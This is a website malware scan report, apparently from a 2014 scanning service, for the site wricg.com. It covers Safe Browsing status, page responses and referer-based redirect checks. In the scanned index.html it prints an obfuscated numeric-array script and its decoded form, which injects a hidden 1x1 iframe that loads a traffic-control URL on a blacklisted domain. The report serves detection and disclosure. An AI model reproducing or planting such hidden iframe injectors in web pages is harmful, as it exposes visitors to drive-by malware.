Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wricg.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wricg.com/ | HTTP/1.1 200 OK Date: Fri, 26 Sep 2014 19:07:12 GMT Accept-Ranges: bytes ETag: "4c789543b05dcb1:5897" Server: Microsoft-IIS/6.0 Content-Length: 2904 Content-Location: http://wricg.com/index.html Content-Type: text/html Last-Modified: Sun, 26 Sep 2010 19:23:13 GMT X-Powered-By: ASP.NET | clean |
http://wricg.com/index.html | 200 OK Content-Length: 2904 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: robingood.cz.cc ;qmux=new Array(15,80,91,87,65,89,81,90,64,26,67,70,93,64,81,28,22,8,86,91,80,77,10,8,71,87,70,93,68,64,10,15,66,85,70,20,68,91,85,94,89,9,19,82,70,19,15,66,85,70,20,66,82,69,90,9,19,93,19,15,66,85,70,20,90,89,86,86,76,9,19,89,81,19,15,66,85,70,20,83,90,85,70,90,9,19,85,19,15,66,85,70,20,85,91,68,89,9,80,91,87,65,89,81,90,64,15,66,85,70,20,76,88,83,89,78,9,19,67,93,80,64,92,19,15,66,85,70,20,66,88,90,69,9,19,92,64,64,68,14,27,27,70,91,86,93,90,83,91,91 ...[1142 bytes skipped]... Decoded script: ;document.write("<body>;var poajm='fr';var vfqn='i';var nmbbx='me';var gnarn='a';var aopm=document;var xlgmz='width';var vlnq='http://robingood.cz.cc/trafcontrol/go.php?sid=6';var dehqr='height';var sofz='style';var fqpo='1';var eeevb='visibility:hidden';var bnoij='src';var wasa=aopm.createElement(vfqn+poajm+gnarn+nmbbx);wasa.setAttribute(xlgmz,fqpo);wasa.setAttribute(dehqr,fqpo);wasa.setAttribute(sofz,eeevb);wasa.setAttribute(bnoij,vlnq);aopm.body.appendChild(wasa);;"); ;document.write("<body>;var poajm='fr';var vfqn='i';var nmbbx='me';var gnarn='a';var aopm=document;var xl ...[841 bytes skipped]... | ||
http://wricg.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wricg.com
Result:
HTTP/1.1 200 OK
Date: Fri, 26 Sep 2014 19:07:12 GMT
Accept-Ranges: bytes
ETag: "4c789543b05dcb1:5897"
Server: Microsoft-IIS/6.0
Content-Length: 2904
Content-Location: http://wricg.com/index.html
Content-Type: text/html
Last-Modified: Sun, 26 Sep 2010 19:23:13 GMT
X-Powered-By: ASP.NET
...2904 bytes of data.
GET / HTTP/1.1
Host: wricg.com
Result:
HTTP/1.1 200 OK
Date: Fri, 26 Sep 2014 19:07:12 GMT
Accept-Ranges: bytes
ETag: "4c789543b05dcb1:5897"
Server: Microsoft-IIS/6.0
Content-Length: 2904
Content-Location: http://wricg.com/index.html
Content-Type: text/html
Last-Modified: Sun, 26 Sep 2010 19:23:13 GMT
X-Powered-By: ASP.NET
...2904 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wricg.com
Referer: http://www.google.com/search?q=wricg.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wricg.com
Referer: http://www.google.com/search?q=wricg.com
Result:
The result is similar to the first query. There are no suspicious redirects found.